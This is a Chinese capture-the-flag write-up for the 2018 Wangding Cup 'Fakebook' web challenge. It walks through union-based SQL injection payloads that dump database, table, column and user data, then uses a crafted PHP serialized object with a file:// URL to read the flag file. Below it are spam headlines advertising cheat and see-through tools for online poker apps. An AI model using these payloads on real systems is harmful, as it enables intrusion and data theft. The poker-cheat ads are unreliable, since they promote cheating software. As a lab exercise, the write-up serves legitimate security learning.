[网鼎杯 2018]Fakebook1
创始人
2024-11-13 07:35:42
0

打开题目

先创建用户,登录试试

观察网址,这是一道注入的题目

测试注入列数
说明注入列数为4

测试注入点
union select 被过滤

替代?no=0 union all select 1,2,3, 4 %23

2是注入点

爆数据库

?no=0 union all select 1,group_concat(schema_name),3, 4 from
information_schema.schemata %23

爆表名

?no=0 union all select 1,group_concat(table_name),3, 4 from
information_schema.tables where table_schema=‘fakebook’ # 

爆字段

?no=0 union all select 1,group_concat(column_name),3, 4 from
information_schema.columns where table_name=‘users’ #

爆数据

?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #

构造序列化结果
data中的数据

?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #

最后查看源码,看到base64,解码得到flag

上一篇:四分钟了解!wpk微扑克其实真的是有挂的(透视作弊)wepOKer能透视的(有挂手段)

下一篇:后表观遗传学时代如何开展DNA甲基化研究?

相关内容

热门资讯

我来向大家传授!wepoker... 我来向大家传授!wepoker有透视底牌吗,微信牵手跑辅助下载,竟然存在有辅助工具(有挂攻略)1、微...
科技分享!wepoker黑侠破... 科技分享!wepoker黑侠破解,wepoker辅助器是真的吗,总是真的有辅助辅助(有挂方式)1、玩...
发现一款!hhpoker底牌透... 发现一款!hhpoker底牌透视脚本,九九联盟解码器,总是是有辅助插件(有挂解惑)1、九九联盟解码器...
最新技巧!cloudpoker... 最新技巧!cloudpoker怎么开挂,至友互娱情怀房卡,果然是真的有辅助下载(有挂规律)1、许多玩...
技术分享!德州私人局怎么透视,... 技术分享!德州私人局怎么透视,方片比鸡脚本,竟然真的是有辅助神器(有人有挂)1、德州私人局怎么透视有...
重大通报!wepoker辅助分... 重大通报!wepoker辅助分析器,闲逸辅助软件下载,好像是真的有辅助安装(有挂工具)1.闲逸辅助软...
科普!wepoker祈福有用吗... 科普!wepoker祈福有用吗,宝宝浙江游戏脚本,都是有辅助开挂(有挂教程)1、宝宝浙江游戏脚本模拟...
终于懂了!安装不了wepoke... 终于懂了!安装不了wepoker,悠闲川南辅助器,确实有辅助插件(有挂教程)1、完成悠闲川南辅助器有...
热点推荐!德州hhpoker是... 热点推荐!德州hhpoker是真的吗,决战卡五星辅助软件,其实有辅助辅助(有挂技巧)1、让任何用户在...
玩家攻略!智星德州插件怎么下载... 玩家攻略!智星德州插件怎么下载,混沌休闲有没有挂,竟然有辅助神器(有挂猫腻)1、许多玩家不知道智星德...